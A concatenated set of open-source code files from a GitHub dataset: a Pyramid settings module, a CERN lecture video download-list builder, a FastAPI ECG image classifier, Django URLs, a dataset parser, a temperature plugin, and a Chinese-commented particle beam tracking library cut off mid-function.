database(settings, paths):\n settings['db:type'] = 'postgresql'\n settings['db:login'] = 'rotarran'\n settings['db:password'] = 'rotarran'\n settings['db:host'] = 'postgres'\n settings['db:name'] = 'rotarran'\n settings['db:port'] = '5432'\n settings['db:options'] = {}\n\n with paths.context('data') as data:\n data.set('sqlite_db', 'data', 'sqlite3.db')\n\n\ndef project(settings, paths):\n settings['secret'] = 'asdasdasdasdweq312iuashi1u2h13o2'\n settings['package:name'] = 'rotarran'\n\n\ndef debug(settings, paths):\n settings['debug'] = True\n settings['pyramid.reload_templates'] = True\n settings['pyramid.debug_notfound'] = True\n settings['pyramid.debug_routematch'] = True\n\n\ndef logger(settings, paths):\n settings['loggers'] = {\n 'loggers': {\n 'keys': 'root, sqlalchemy, alembic',\n },\n 'handlers': {\n 'keys': 'console, all',\n },\n 'formatters': {\n 'keys': 'generic',\n },\n 'logger_root': {\n 'level': 'INFO',\n 'handlers': 'console, all',\n },\n 'logger_sqlalchemy': {\n 'level': 'INFO',\n 'handlers': 'all',\n 'qualname': 'sqlalchemy.engine',\n 'propagate': '0',\n },\n 'logger_alembic': {\n 'level': 'INFO',\n 'handlers': 'all',\n 'qualname': 'alembic',\n 'propagate': '0',\n },\n 'handler_console': {\n 'class': 'StreamHandler',\n 'args': '(sys.stderr,)',\n 'level': 'NOTSET',\n 'formatter': 'generic',\n },\n 'handler_all': {\n 'class': 'FileHandler',\n 'args': \"('{}', 'a')\".format(paths.get('logs:all')),\n 'level': 'NOTSET',\n 'formatter': 'generic',\n },\n 'formatter_generic': {\n 'format': '%%(asctime)s %%(levelname)-5.5s [%%(name)s][%%(threadName)s] %%(message)s',\n },\n }\n","repo_name":"socek/rotarran","sub_path":"backend/code/rotarran/application/settings/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35360742985","text":"from pathlib import Path\nimport os\nimport csv\nimport json\n\n# get current working directory\n # rootPath=Path(makelist)\n # rootPath=rootPath.parent\n # os.chdir(str(rootPath))\nrootPath=Path(os.getcwd())\n\n# URL template for desktop slide 1080p video\nurlTemplate=['https://mediastream.cern.ch/MediaArchive/Video/Public/WebLectures/2014/(%eventID)/(%eventID)_desktop_slides_1080p_4000.mp4',\n 'https://mediastream.cern.ch/MediaArchive/Video/Public/WebLectures/2014/(%eventID)/(%eventID)_desktop_camera_1080p_4000.mp4',\n 'https://mediastream.cern.ch/MediaArchive/Video/Public/WebLectures/2014/(%eventID)/lecture.json',\n 'https://mediastream.cern.ch/MediaArchive/Video/Public/WebLectures/2014/(%eventID)/thumbs/(%picName)']\nlocalname=['(%lectureID).(%counter)_slides_1080p.mp4',\n '(%lectureID).(%counter)_camera_1080p.mp4',\n 'lecture.json',\n 'thumbs/(%picName)']\n\n# check if 'downloadList.csv' exists\np=Path('downloadList.csv')\nif not p.exists():\n p.open('w').close()\n\n# Read URL list from 'downloadList.csv' first\nURLlist=set()\nwith open('downloadList.csv',newline='') as f:\n reader=csv.reader(f,delimiter=';')\n try:\n for status, name, URL in reader:\n URLlist.add(URL)\n except ValueError:\n print ('Error: \"downloadList.csv\" end with new line. This may lead to repeated download.\\n',\n ' Please delete the new line and restart this program.')\n raise ValueError\n\n# write download list to 'downlodaList.csv' using csv.writer\nwith open('downloadList.csv','a') as f:\n csvwriter = csv.writer(f,delimiter=';')\n for idList in rootPath.glob('**/eventID'):\n # find all 'eventID' files in sub-directories and read the event id\n print (idList.parent.relative_to(rootPath))\n # generate relative path of 'eventID'\n lectureID=str(idList.parent.relative_to(rootPath))[0:2]\n with idList.open() as eventID:\n counter=0\n for ID in eventID.readlines():\n if ID!='\\n':\n counter=counter+1\n # generate download entry information\n for i in [0,1,2]:\n item=['{: <50}'.format('Queued'),\n './'+str(idList.parent.relative_to(rootPath))+'/'\n +str(counter)+'/'\n +localname[i].replace('(%lectureID)',lectureID)\n .replace('(%counter)',str(counter)),\n urlTemplate[i].replace('(%eventID)',ID[:-1])]\n # write to the file\n if item[2] not in URLlist:\n URLlist.add(item[2])\n csvwriter.writerow(item)\n \n # try to read lecture.json and add pic entry\n jfile=Path(str(idList.parent)+'/'+str(counter)+'/lecture.json')\n if jfile.exists():\n with jfile.open() as f:\n lecture = json.load(f)\n lecture = lecture['lecture']['thumbs']\n for x in lecture:\n item=['{: <50}'.format('Queued'),\n './'+str(idList.parent.relative_to(rootPath))+'/'\n +str(counter)+'/'\n +localname[3].replace('(%picName)',x['src']),\n urlTemplate[3].replace('(%eventID)',ID[:-1])\n .replace('(%picName)',x['src'])]\n if item[2] not in URLlist:\n URLlist.add(item[2])\n csvwriter.writerow(item)\n # end {if jfile}\n #end {if ID}\n # end {for ID}\n # end {with eventID}\n # end {for idList}\n# end {with f}\n\n\n\n","repo_name":"George-Gate/CERN-Video-Downloader","sub_path":"MakeDownloadList.py","file_name":"MakeDownloadList.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37931992806","text":"from _dataset import read_gamma, read_solar, read_mnist\n\n\n# Holds all datasets for testing/training\nclass Data(object):\n def __init__(self):\n self.mnist_X = None\n self.mnist_Y = None\n self.mnist_x = None\n self.mnist_y = None\n self.gamma_X = None\n self.gamma_Y = None\n self.gamma_x = None\n self.gamma_y = None\n self.solar_X = None\n self.solar_Y = None\n self.solar_x = None\n self.solar_y = None\n self.load()\n\n # reads data from file(s) for program use\n def load(self):\n self.gamma_X, self.gamma_Y, self.gamma_x, self.gamma_y = read_gamma.read()\n self.mnist_X, self.mnist_Y, self.mnist_x, self.mnist_y = read_mnist.read()\n self.solar_X, self.solar_Y, self.solar_x, self.solar_y = read_solar.read()\n print('')\n\n # if randomizing tests, use this function\n def get(self, i):\n switcher = {\n 0: self.gamma(),\n 1: self.mnist(),\n 2: self.solar(),\n }\n return switcher.get(i)\n\n # which dataset are we using?\n def using(self,i):\n switcher = {\n 0: 'Gamma Ray',\n 1: 'MNIST',\n 2: 'Solar',\n }\n return switcher.get(i, 'rip')\n\n # the number of datasets in use\n def sets(self):\n return 3\n\n def gamma(self):\n return self.gamma_X, self.gamma_Y, self.gamma_x, self.gamma_y\n\n def mnist(self):\n return self.mnist_X, self.mnist_Y, self.mnist_x, self.mnist_y\n\n def solar(self):\n return self.solar_X, self.solar_Y, self.solar_x, self.solar_y\n","repo_name":"mahdafr/19w_cs5361-labs","sub_path":"lab4/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11447552137","text":"from fastapi import FastAPI, UploadFile\nfrom fastapi.responses import FileResponse\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom PIL import Image\nfrom torchvision.transforms import Compose, Resize, ToTensor, Normalize\nimport torch\nfrom io import BytesIO\nfrom ecg_model.grad import ecg_grad\nfrom ecg_model.save_load_model import load_model_url\n\n\ndef transformation(image):\n transform = Compose([\n Resize((224, 224)),\n ToTensor(),\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n return transform(image)\n\napp = FastAPI()\n\n\n# Allowing all middleware is optional, but good practice for dev purposes\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"], # Allows all origins\n allow_credentials=True,\n allow_methods=[\"*\"], # Allows all methods\n allow_headers=[\"*\"], # Allows all headers\n)\n\n@app.post(\"/predict\")\nasync def predict(file: UploadFile, model_url):\n class_names = ['Abnormal', 'Normal']\n\n file_request = await file.read()\n app.state.model = load_model_url(model_url)\n X_img = Image.open(BytesIO(file_request)).convert('RGB')\n img_processed = transformation(X_img)\n img_processed = img_processed.unsqueeze(0)\n\n # Set the model to evaluation mode\n app.state.model.eval()\n\n # Forward pass\n with torch.no_grad():\n output = app.state.model(img_processed)\n\n probabilities = torch.nn.functional.softmax(output, dim=1)\n predicted_prob, predicted_label = torch.max(probabilities, 1)\n predicted_class = class_names[predicted_label.item()]\n predicted_prob = round(predicted_prob.item() * 100, 1)\n\n ecg_grad(app.state.model, img_processed, X_img)\n\n response = FileResponse(\"ecg_model/api/grad_cam.jpg\")\n response.headers[\"prediction\"] = predicted_class\n response.headers[\"confidence\"] = f\"{predicted_prob}%\"\n return response\n","repo_name":"Dsacras/ecg_photo","sub_path":"ecg_model/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38052125641","text":"from django.urls import path\nfrom . import views\n\napp_name = 'unit'\n\nurlpatterns = [\n # post views\n path('search/', views.airman_search, name='airman_search'),\n # path('search/', views.airman_first_name_search(), name='airman_first_name_search'),\n path('////',\n views.airman_detail,\n name='airman_detail'),\n path('failures/', views.FailureListView.as_view(), name='all_failure_list'),\n path('profiles/', views.ProfileListView.as_view(), name='all_profile_list'),\n path('ptls/', views.PhysicalTrainingLeaderListView.as_view(), name='all_ptl_list'),\n path('ufpms/', views.UnitFitnessProgramManagerListView.as_view(), name='all_ufpm_list'),\n path('', views.AirmanListView.as_view(), name='airman_list'),\n]\n","repo_name":"lopezjronald/django-unit-fitness-program","sub_path":"asts_fitness_program/unit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4338169904","text":"def merge(list_of_lists):\n merged_list = []\n\n for list in list_of_lists:\n for item in list:\n merged_list.append(item)\n\n return merged_list\n\n\nctrlSamples = []\ntestSamples = []\nclasses = []\n\ndataSet = open(\"X_train.txt\", \"r\")\n\nfor line in dataSet:\n line = line.rstrip(\"\\n\")\n line = line.rstrip(\"\\r\")\n attributes = line.split(' ')\n attributes = filter(lambda a: a != '', attributes)\n ctrlSamples.append(attributes)\n\ndataSet.close()\n\ndataSet = open(\"y_train.txt\", \"r\")\n\nfor line in dataSet:\n line = line.rstrip(\"\\n\")\n line = line.rstrip(\"\\r\")\n classes.append(str(int(line) - 1))\n\ndataSet.close()\n\ndataSet = open(\"X_test.txt\", \"r\")\n\nfor line in dataSet:\n line = line.rstrip(\"\\n\")\n line = line.rstrip(\"\\r\")\n attributes = line.split(' ')\n attributes = filter(lambda a: a != '', attributes)\n testSamples.append(attributes)\n\ndataSet.close()\n\nctrl = len(ctrlSamples)\ntest = len(testSamples)\nattr = len(ctrlSamples[0])\n\nctrlSamples = [float(i) for i in merge(ctrlSamples)]\ntestSamples = [float(i) for i in merge(testSamples)]\nclasses = [int(i) for i in classes]\n\ntext = open(\"human_activity_recognition_using_smartphones.parse\", \"w\")\n\nfor item in merge([ctrlSamples, testSamples, classes]):\n text.write(str(item) + '\\n')\n\ntext.close()\n\nconfig = open(\"human_activity_recognition_using_smartphones.cfg\", \"w\")\n\nconfig.write(str(ctrl) + \" # ctrl samples\\n\")\nconfig.write(str(test) + \" # test samples\\n\")\nconfig.write(str(attr) + \" # features\\n\")\nconfig.write(\"6 # classes\\n\")\n\nconfig.close()","repo_name":"joaomiguelvieira/kNNSim","sub_path":"datasets/5_human_activity_recognition_using_smartphones/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"30325329165","text":"# -*- coding: iso-8859-15 -*-\n\nimport requests\nimport json\n\nimport config\n\n\ndef temperature(data):\n temperature = []\n try:\n for url in config.PLUGINS['temperature']['urls']:\n temp_json = json.loads(requests.get(url, timeout=5).text)\n for loc, temp in temp_json.items():\n temperature_item = {\n 'value': temp,\n 'unit': '°C',\n 'location': loc\n }\n temperature.append(temperature_item)\n except Exception as e:\n print(\"TEMPERATURE: Unexpected error\")\n print(e)\n\n data['sensors']['temperature'] = temperature\n\n return data\n\n\ndef temperature_html(data, args):\n if 'sensors' in data and 'temperature' in data['sensors']:\n args['temperatures'] = data['sensors']['temperature']\n\n return args\n","repo_name":"Bytespeicher/space-status","sub_path":"plugins/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72963626113","text":"\"\"\"\n粒子和粒子跟踪\n\"\"\"\nfrom typing import List, Tuple\n\nimport numpy as np\n\nfrom cctpy.abstract_classes import Plotable, Magnet, LocalCoordinateSystem\nfrom cctpy.baseutils import Vectors, Equal, Stream, Ellipse\nfrom cctpy.constant import MM, LIGHT_SPEED, Protons, ZI\n\n\nclass RunningParticle(Plotable):\n \"\"\"\n 在全局坐标系中运动的一个粒子\n position 位置,三维矢量,单位 [m, m, m]\n velocity 速度,三位矢量,单位 [m/s, m/s, m/s]\n relativistic_mass 相对论质量,又称为动质量,单位 kg, M=Mo/√(1-v^2/c^2)\n e 电荷量,单位 C 库伦\n speed 速率,单位 m/s\n distance 运动距离,单位 m\n \"\"\"\n\n def __init__(self, position: np.ndarray, velocity: np.ndarray,\n relativistic_mass: float, e: float, speed: float, distance: float = 0.0):\n \"\"\"\n 在全局坐标系中运动的一个粒子\n Parameters\n ----------\n position 位置,三维矢量,单位 [m, m, m]\n velocity 速度,三位矢量,单位 [m/s, m/s, m/s]\n relativistic_mass 相对论质量,又称为动质量,单位 kg, M=Mo/√(1-v^2/c^2)\n e 电荷量,单位 C 库伦\n speed 速率,单位 m/s\n distance 运动距离,单位 m\n \"\"\"\n self.position = position\n self.velocity = velocity\n self.relativistic_mass = relativistic_mass\n self.e = e\n self.speed = speed\n self.distance = distance\n\n def run_self_in_magnetic_field(self, magnetic_field: np.ndarray, footstep: float = 1 * MM) -> None:\n \"\"\"\n 粒子在磁场 magnetic_field 中运动 footstep 长度\n Parameters\n ----------\n magnetic_field 磁场,看作恒定场\n footstep 步长,默认 1 MM\n\n Returns None\n -------\n \"\"\"\n # 计算受力 qvb\n f = self.e * (np.cross(self.velocity, magnetic_field))\n # 计算加速度 a = f/m\n a = f / self.relativistic_mass\n # 计算运动时间\n t = footstep / self.speed\n # 位置变化\n self.position += t * self.velocity\n # 速度变化\n self.velocity += t * a\n # 运动距离\n self.distance += footstep\n\n def copy(self):\n \"\"\"\n 深拷贝粒子\n Returns 深拷贝粒子\n -------\n\n \"\"\"\n return RunningParticle(\n self.position.copy(),\n self.velocity.copy(),\n self.relativistic_mass,\n self.e,\n self.speed,\n self.distance,\n )\n\n def line_and_color(self, describe: str = 'r.') -> List[Tuple[np.ndarray, str]]:\n return [\n ([self.position], describe)\n ]\n\n def compute_scalar_momentum(self) -> float:\n \"\"\"\n 获得标量动量\n Returns 标量动量\n -------\n\n \"\"\"\n return self.speed * self.relativistic_mass\n\n def change_scalar_momentum(self, scalar_momentum: float) -> None:\n \"\"\"\n 改变粒子的标量动量。\n 注意:真正改变的是粒子的速度和动质量\n 这个方法用于生成一组动量分散的粒子\n\n scalar_momentum 标量动量\n Returns None\n -------\n\n \"\"\"\n # 先求 静止质量\n m0 = self.relativistic_mass * np.sqrt(1 - (self.speed ** 2) / (LIGHT_SPEED ** 2))\n # 求新的速率\n new_speed = scalar_momentum / np.sqrt(m0 ** 2 + (scalar_momentum / LIGHT_SPEED) ** 2)\n # 求新的动质量\n new_relativistic_mass = m0 / np.sqrt(1 - (new_speed / LIGHT_SPEED) ** 2)\n # 求新的速度\n new_velocity = Vectors.update_length(self.velocity, new_speed)\n\n # 写入\n self.relativistic_mass = new_relativistic_mass\n self.speed = new_speed\n self.velocity = new_velocity\n\n # 验证\n Equal.require_float_equal(\n scalar_momentum, self.compute_scalar_momentum(),\n f\"RunningParticle::change_scalar_momentum异常,scalar_momentum{scalar_momentum}!=self.compute_scalar_momentum{self.compute_scalar_momentum}\",\n err=1e-6\n )\n\n Equal.require_float_equal(\n self.speed, Vectors.length(self.velocity),\n f\"RunningParticle::change_scalar_momentum异常,self.speed{self.speed}!=Vectors.length(self.velocity){Vectors.length(self.velocity)}\"\n )\n\n def get_natural_coordinate_system(self, y_direction: np.ndarray = ZI) -> LocalCoordinateSystem:\n return LocalCoordinateSystem.create_by_y_and_z_direction(self.position, y_direction, self.velocity)\n\n def __str__(self) -> str:\n return f\"p={self.position},v={self.velocity},v0={self.speed}\"\n\n\nclass ParticleRunner:\n \"\"\"\n 粒子运动工具类\n \"\"\"\n\n @staticmethod\n def run_only(p: RunningParticle, m: Magnet, length: float, footstep: float = 1 * MM) -> None:\n \"\"\"\n 让粒子 p 在磁场 m 中运动 length 距离,步长 footstep\n Parameters\n ----------\n p 粒子\n m 磁场\n length 运动长度\n footstep 步长\n\n Returns None\n -------\n\n \"\"\"\n distance = 0.0\n while distance < length:\n p.run_self_in_magnetic_field(m.magnetic_field_at(p.position), footstep=footstep)\n distance += footstep\n\n @staticmethod\n def run_get_trajectory(p: RunningParticle, m: Magnet, length: float, footstep: float = 1 * MM) -> np.ndarray:\n \"\"\"\n 让粒子 p 在磁场 m 中运动 length 距离,步长 footstep\n 获得粒子的轨迹\n Parameters\n ----------\n p 粒子\n m 磁场\n length 运动长度\n footstep 步长\n\n Returns 轨迹 np.ndarray,是三维点的数组\n -------\n\n \"\"\"\n trajectory = np.empty((int(length / footstep) + 1, 3))\n trajectory[0, :] = p.position.copy()\n\n i = 1\n distance = 0.0\n while distance < length:\n p.run_self_in_magnetic_field(m.magnetic_field_at(p.position), footstep=footstep)\n distance += footstep\n trajectory[i, :] = p.position.copy()\n i += 1\n\n return trajectory[0:i, :]\n\n @staticmethod\n def run_get_all_info(p: RunningParticle, m: Magnet, length: float, footstep: float = 1 * MM) \\\n -> List[RunningParticle]:\n \"\"\"\n 让粒子 p 在磁场 m 中运动 length 距离,步长 footstep\n 获得粒子全部信息\n Parameters\n ----------\n p 粒子\n m 磁场\n length 运动长度\n footstep 步长\n\n Returns 每一步处的粒子全部信息 List[RunningParticle]\n -------\n\n \"\"\"\n all_info: List[RunningParticle] = [p.copy()]\n distance = 0.0\n while distance < length:\n p.run_self_in_magnetic_field(m.magnetic_field_at(p.position), footstep=footstep)\n distance += footstep\n all_info.append(p.copy())\n\n return all_info\n\n @staticmethod\n def run_ps_only_cpu0(ps: List[RunningParticle], m: Magnet, length: float, footstep: float = 1 * MM) -> None:\n \"\"\"\n 让粒子群 ps 在磁场 m 中运动 length 距离,步长 footstep\n CPU 计算 单线程\n Parameters\n ----------\n ps 一群粒子\n m 磁场\n length 运动长度\n footstep 步长\n\n\n Returns None\n -------\n\n \"\"\"\n for p in ps:\n ParticleRunner.run_only(p, m, length, footstep)\n\n\nclass PhaseSpaceParticle:\n XXP_PLANE = 1\n YYP_PLANE = 2\n\n \"\"\"\n 相空间中的粒子,6个坐标 x xp y yp z delta\n \"\"\"\n\n def __init__(self, x: float, xp: float, y: float, yp: float, z: float, delta: float):\n self.x = x\n self.xp = xp\n self.y = y\n self.yp = yp\n self.z = z\n self.delta = delta\n\n def project_to_xxp_plane(self) -> np.ndarray:\n \"\"\"\n 投影到 x-xp 平面\n Returns [self.x, self.xp]\n -------\n\n \"\"\"\n return np.array([self.x, self.xp])\n\n def project_to_yyp_plane(self) -> np.ndarray:\n \"\"\"\n 投影到 y-yp 平面\n Returns [self.y, self.yp]\n -------\n\n \"\"\"\n return np.array([self.y, self.yp])\n\n def project_to_plane(self, plane_id: int) -> np.ndarray:\n if plane_id == PhaseSpaceParticle.XXP_PLANE:\n return self.project_to_xxp_plane()\n elif plane_id == PhaseSpaceParticle.YYP_PLANE:\n return self.project_to_yyp_plane()\n else:\n raise ValueError(f\"没有处理plane_id({plane_id})的方法\")\n\n @staticmethod\n def phase_space_particles_along_positive_ellipse_in_xxp_plane(\n xMax: float, xpMax: float, delta: float, number: int\n ) -> List:\n \"\"\"\n 获取分布于 x xp 平面上 正相椭圆上的 PhaseSpaceParticles\n 注意是 正相椭圆\n Parameters\n ----------\n xMax 相椭圆参数 x 最大值\n xpMax 相椭圆参数 xp 最大值\n delta 动量分散\n number 粒子数目\n\n Returns 分布于 x xp 平面上 正相椭圆上的 PhaseSpaceParticles\n -------\n\n \"\"\"\n A: float = 1 / (xMax ** 2)\n B: float = 0\n C: float = 1 / (xpMax ** 2)\n D: float = 1\n\n return Stream(Ellipse(A, B, C, D).uniform_distribution_points_along_edge(number).tolist()).map(\n lambda p: PhaseSpaceParticle(p[0], p[1], 0, 0, 0, delta)).to_list()\n\n @staticmethod\n def phase_space_particles_along_positive_ellipse_in_yyp_plane(\n yMax: float, ypMax: float, delta: float, number: int\n ) -> List:\n \"\"\"\n 获取分布于 y yp 平面上 正相椭圆上的 PhaseSpaceParticles\n 注意是 正相椭圆\n Parameters\n ----------\n yMax 相椭圆参数 y 最大值\n ypMax 相椭圆参数 yp 最大值\n delta 动量分散\n number 粒子数目\n\n Returns 分布于 y yp 平面上 正相椭圆上的 PhaseSpaceParticles\n -------\n\n \"\"\"\n A: float = 1 / (yMax ** 2)\n B: float = 0\n C: float = 1 / (ypMax ** 2)\n D: float = 1\n\n return Stream(Ellipse(A, B, C, D).uniform_distribution_points_along_edge(number).tolist()).map(\n lambda p: PhaseSpaceParticle(0, 0, p[0], p[1], 0, delta)\n ).to_list()\n\n @staticmethod\n def phase_space_particles_along_positive_ellipse_in_plane(\n plane_id: int, xMax: float, xpMax: float, delta: float, number: int\n ) -> List:\n \"\"\"\n 获取分布于 x xp 平面上或 y yp 平面上的,正相椭圆上的 PhaseSpaceParticles\n Parameters\n ----------\n xxPlane x 平面或 y 平面,true:x 平面,false:y 平面\n xMax 相椭圆参数 x/y 最大值\n xpMax 相椭圆参数 xp/yp 最大值\n delta 动量分散\n number 粒子数目\n\n Returns 分布于 x xp 平面上或 y yp 平面上的,正相椭圆上的 PhaseSpaceParticles\n -------\n\n \"\"\"\n if plane_id == PhaseSpaceParticle.XXP_PLANE:\n return PhaseSpaceParticle.phase_space_particles_along_positive_ellipse_in_xxp_plane(\n xMax, xpMax, delta, number\n )\n elif plane_id == PhaseSpaceParticle.YYP_PLANE:\n return PhaseSpaceParticle.phase_space_particles_along_positive_ellipse_in_yyp_plane(\n xMax, xpMax, delta, number\n )\n else:\n raise ValueError(f\"没有处理plane_id({plane_id})的方法\")\n\n @staticmethod\n def phase_space_particles_project_to_xxp_plane(phase_space_particles: List) -> np.ndarray:\n \"\"\"\n 相空间粒子群投影到 x 平面\n Parameters\n ----------\n phase_space_particles 相空间粒子群\n\n Returns 相空间粒子群投影到 x 平面 [[x1,xp1], [x2,xp2] .. ]\n -------\n\n \"\"\"\n return Stream(phase_space_particles).map(\n lambda p: p.project_to_xxp_plane()\n ).to_vector()\n\n @staticmethod\n def phase_space_particles_project_to_yyp_plane(phase_space_particles: List) -> np.ndarray:\n \"\"\"\n 相空间粒子群投影到 y 平面\n Parameters\n ----------\n phase_space_particles 相空间粒子群\n\n Returns 相空间粒子群投影到 y 平面 [[y1,yp1], [y2,yp2] .. ]\n -------\n\n \"\"\"\n return Stream(phase_space_particles).map(\n lambda p: p.project_to_yyp_plane()\n ).to_vector()\n\n @staticmethod\n def phase_space_particles_project_to_plane(phase_space_particles: List, plane_id: int) -> np.ndarray:\n \"\"\"\n 相空间粒子群投影到 x/y 平面\n Parameters\n ----------\n phase_space_particles 相空间粒子群\n plane_id 投影到 x 或 y 平面\n\n Returns 相空间粒子群投影到 x/y 平面\n -------\n\n \"\"\"\n if plane_id == PhaseSpaceParticle.XXP_PLANE:\n return PhaseSpaceParticle.phase_space_particles_project_to_xxp_plane(phase_space_particles)\n elif plane_id == PhaseSpaceParticle.YYP_PLANE:\n return PhaseSpaceParticle.phase_space_particles_project_to_yyp_plane(phase_space_particles)\n else:\n raise ValueError(f\"没有处理plane_id({plane_id})的方法\")\n\n @staticmethod\n def create_from_running_particle(ideal_particle: RunningParticle,\n coordinate_system: LocalCoordinateSystem,\n running_particle: RunningParticle):\n # x y z\n relative_position = running_particle.position - ideal_particle.position\n x = np.inner(coordinate_system.XI, relative_position)\n y = np.inner(coordinate_system.YI, relative_position)\n z = np.inner(coordinate_system.ZI, relative_position)\n\n # xp yp\n relative_velocity = running_particle.velocity - ideal_particle.velocity\n xp = np.inner(coordinate_system.XI, relative_velocity) / ideal_particle.speed\n yp = np.inner(coordinate_system.YI, relative_velocity) / ideal_particle.speed\n\n # delta\n rm = running_particle.compute_scalar_momentum()\n im = ideal_particle.compute_scalar_momentum()\n delta = (rm - im) / im\n\n return PhaseSpaceParticle(x, xp, y, yp, z, delta)\n\n @staticmethod\n def create_from_running_particles(ideal_particle: RunningParticle,\n coordinate_system: LocalCoordinateSystem,\n running_particles: List[RunningParticle]) -> List:\n return Stream(running_particles).map(\n lambda rp: PhaseSpaceParticle.create_from_running_particle(\n ideal_particle, coordinate_system, rp)\n ).to_list()\n\n @staticmethod\n def convert_delta_from_momentum_dispersion_to_energy_dispersion(phaseSpaceParticle, centerKineticEnergy_MeV):\n \"\"\"\n 动量分散改动能分散\n Parameters\n ----------\n phaseSpaceParticle 原粒子\n centerKineticEnergy_MeV 中心动能,如 250\n\n Returns 动量分散改动能分散后的粒子\n -------\n\n \"\"\"\n copied: PhaseSpaceParticle = phaseSpaceParticle.copy()\n deltaMomentumDispersion = copied.delta\n deltaEnergyDispersion = Protons.convert_momentum_dispersion_to_energy_dispersion(\n deltaMomentumDispersion, centerKineticEnergy_MeV)\n\n copied.delta = deltaEnergyDispersion\n\n return copied\n\n @staticmethod\n def convert_delta_from_momentum_dispersion_to_energy_dispersion_for_list(phaseSpaceParticles: List,\n centerKineticEnergy_MeV):\n \"\"\"\n 动量分散改动能分散,见上方法 convert_delta_from_momentum_dispersion_to_energy_dispersion\n Parameters\n ----------\n phaseSpaceParticles\n centerKineticEnergy_MeV\n\n Returns\n -------\n\n \"\"\"\n return Stream(phaseSpaceParticles).map(\n lambda pp: PhaseSpaceParticle.convert_delta_from_momentum_dispersion_to_energy_dispersion(\n pp, centerKineticEnergy_MeV)\n ).to_list()\n\n @staticmethod\n def convert_delta_from_energy_dispersion_to_energy_dispersion_momentum_dispersion(phaseSpaceParticle,\n centerKineticEnergy_MeV: float):\n copied = phaseSpaceParticle.copy()\n\n EnergyDispersion = copied.getDelta()\n\n MomentumDispersion = Protons.convert_energy_dispersion_to_momentum_dispersion(\n EnergyDispersion, centerKineticEnergy_MeV)\n\n copied.delta = MomentumDispersion\n\n return copied\n\n @staticmethod\n def convert_delta_from_energy_dispersion_to_energy_dispersion_momentum_dispersion_for_list(\n phaseSpaceParticles: List, centerKineticEnergy_MeV: float):\n return Stream(phaseSpaceParticles).map(\n lambda pp: PhaseSpaceParticle.convert_delta_from_energy_dispersion_to_energy_dispersion_momentum_dispersion(\n pp, centerKineticEnergy_MeV)\n ).to_list()\n\n def __str__(self) -> str:\n return f\"x={self.x},xp={self.xp},y={self.y},yp={self.yp},z={self.z},d={self.delta}\"\n\n def copy(self):\n return PhaseSpaceParticle(self.x, self.xp, self.y, self.yp, self.z, self.delta)\n\n def getDelta(self):\n return self.delta\n\n\nclass ParticleFactory:\n \"\"\"\n 质子工厂\n \"\"\"\n\n @staticmethod\n def create_proton(position: np.ndarray, direct: np.ndarray, kinetic_MeV: float = 250) -> RunningParticle:\n # 速率\n speed = LIGHT_SPEED * np.sqrt(\n 1. - (Protons.STATIC_ENERGY_MeV / (Protons.STATIC_ENERGY_MeV + kinetic_MeV)) ** 2\n )\n\n # mass kg\n relativistic_mass = Protons.STATIC_MASS_KG / np.sqrt(\n 1.0 - (speed ** 2) / (LIGHT_SPEED ** 2)\n )\n\n return RunningParticle(position, Vectors.update_length(direct.copy(), speed), relativistic_mass,\n Protons.CHARGE_QUANTITY, speed)\n\n @staticmethod\n def create_proton_by_position_and_velocity(position: np.ndarray, velocity: np.ndarray) -> RunningParticle:\n speed = Vectors.length(velocity)\n\n relativistic_mass = 0.0\n\n try:\n relativistic_mass = Protons.STATIC_MASS_KG / np.sqrt(\n 1.0 - (speed ** 2) / (LIGHT_SPEED ** 2)\n )\n except RuntimeWarning as e:\n print(\n f\"ParticleFactory::create_proton_by_position_and_velocity 莫名其妙的���常 speed={speed} LIGHT_SPEED={LIGHT_SPEED} e={e}\")\n\n return RunningParticle(position, velocity, relativistic_mass, Protons.CHARGE_QUANTITY, speed)\n\n @staticmethod\n def create_from_phase_space_particle(\n ideal_particle: RunningParticle,\n coordinate_system: LocalCoordinateSystem,\n phase_space_particle: PhaseSpaceParticle) -> RunningParticle:\n \"\"\"\n 通过理想粒子,相空间坐标系 和 相空间粒子,来创造粒子\n Parameters\n ----------\n ideal_particle 理想粒子\n coordinate_system 相空间坐标系\n phase_space_particle 相空间粒子\n\n Returns 通过理想粒子,相空间坐标系 和 相空间粒子,来创造粒子\n -------\n\n \"\"\"\n x = phase_space_particle.x\n xp = phase_space_particle.xp\n y = phase_space_particle.y\n yp = phase_space_particle.yp\n z = phase_space_particle.z\n delta = phase_space_particle.delta\n\n p = ideal_particle.copy()\n # 知道 LocalCoordinateSystem 的用处了吧\n p.position += coordinate_system.XI * x\n p.position += coordinate_system.YI * y\n p.position += coordinate_system.ZI * z\n\n if delta != 0.0:\n scalar_momentum = p.compute_scalar_momentum() * (1. + delta)\n p.change_scalar_momentum(scalar_momentum) # 这个方法就是为了修改动量而写的\n\n p.velocity += coordinate_system.XI * (xp * p.speed)\n p.velocity += coordinate_system.YI * (yp * p.speed)\n\n return p\n\n @staticmethod\n def create_from_phase_space_particles(\n ideal_particle: RunningParticle,\n coordinate_system: LocalCoordinateSystem,\n phase_space_particles: List[PhaseSpaceParticle]) -> List[RunningParticle]:\n return Stream(phase_space_particles).map(\n lambda p: ParticleFactory.create_from_phase_space_particle(ideal_particle, coordinate_system, p)\n 